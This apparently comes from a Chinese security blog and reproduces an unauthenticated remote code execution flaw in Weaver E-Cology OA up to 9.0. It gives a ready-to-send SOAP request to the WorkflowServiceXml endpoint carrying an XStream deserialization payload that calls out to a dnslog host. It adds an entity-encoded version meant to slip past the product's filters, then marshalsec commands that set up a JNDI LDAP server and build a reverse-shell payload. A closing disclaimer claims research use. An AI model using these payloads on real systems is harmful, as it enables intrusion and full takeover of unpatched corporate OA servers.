x微E-Cology WorkflowServiceXml RCE

 

x微E-Cology WorkflowServiceXml RCE

‍‍

一、漏洞描述

泛微E-cology OA系統的WorkflowServiceXml接口可被未授權訪問，攻擊者調用該接口，可構造特定的HTTP請求繞過泛微本身一些安全限制從而達成遠程代碼執行。

‍二、漏洞影響

E-cology <= 9.0

‍三、漏洞復現‍‍

訪問主頁：

 

 

POC：

 

POST /services%20/WorkflowServiceXml HTTP/1.1 Accept-Encoding: gzip, deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 10994 Host: xxx User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: close <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> <web:doCreateWorkflowRequest> . <web:string> <map> <entry> <url>http://thelostworld.dnslog.cn</url> <string>http://thelostworld.dnslog.cn</string> </entry> </map> </web:string> <web:string>2</web:string> . </web:doCreateWorkflowRequest> </soapenv:Body> </soapenv:Envelope>

編碼：

 

 

 

POST /services%20/WorkflowServiceXml HTTP/1.1 Accept-Encoding: gzip, deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 10994 Host: xxx User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: close <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"> <soapenv:Header/> <soapenv:Body> . <web:doCreateWorkflowRequest> <web:string> &lt;&#109;&#97;&#112;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#101;&#110;&#116;&#114;&#121;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#117;&#114;&#108;&gt;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#104;&#101;&#108;&#111;&#115;&#116;&#119;&#111;&#114;&#108;&#100;&#46;&#100;&#110;&#115;&#108;&#111;&#103;&#46;&#99;&#110;&lt;&#47;&#117;&#114;&#108;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#115;&#116;&#114;&#105;&#110;&#103;&gt;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#104;&#101;&#108;&#111;&#115;&#116;&#119;&#111;&#114;&#108;&#100;&#46;&#100;&#110;&#115;&#108;&#111;&#103;&#46;&#99;&#110;&lt;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;&#101;&#110;&#116;&#114;&#121;&gt;&#13;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&lt;&#47;&#109;&#97;&#112;&gt; </web:string> . <web:string>2</web:string> </web:doCreateWorkflowRequest> </soapenv:Body> </soapenv:Envelope>

或者直接：

利用 marshalsec 生成反彈shell payload

啟動 jndi ：ldap服務

 

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8888/#Exploit

生存poc：

 

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream CommonsBeanutils ldap://127.0.0.1:1389/Exploit > payload.xml

DNSlog：

 

 

執行命令

 

 

參考：

https://mp.weixin.qq.com/s/-eTSGvjuygGxULHcw6lOMg

http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEE-Cology%20WorkflowServiceXml%20RCE.html?h=%E6%B3%9B%E5%BE%AEE-Cology%20WorkflowServiceXml%20RCE

免責聲明：本站提供安全工具、程序(方法)可能帶有攻擊性，僅供安全研究與教學之用，風險自負!

如果本文內容侵權或者對貴公司業務或者其他有影響，請聯系作者刪除。

轉載聲明：著作權歸作者所有。商業轉載請聯系作者獲得授權，非商業轉載請注明出處。

訂閱查看更多復現文章、學習筆記

thelostworld

安全路上，與你並肩前行！！！！

 

 

個人知乎：https://www.zhihu.com/people/fu-wei-43-69/columns

個人簡書：https://www.jianshu.com/u/bf0e38a8d400

個人CSDN：https://blog.csdn.net/qq_37602797/category_10169006.html

個人博客園：https://www.cnblogs.com/thelostworld/

FREEBUF主頁：https://www.freebuf.com/author/thelostworld?type=article

語雀博客主頁：https://www.yuque.com/thelostworld

 

 

歡迎添加本公眾號作者微信交流，添加時備注一下“公眾號”

 

 

‍

本文使用 文章同步助手 同步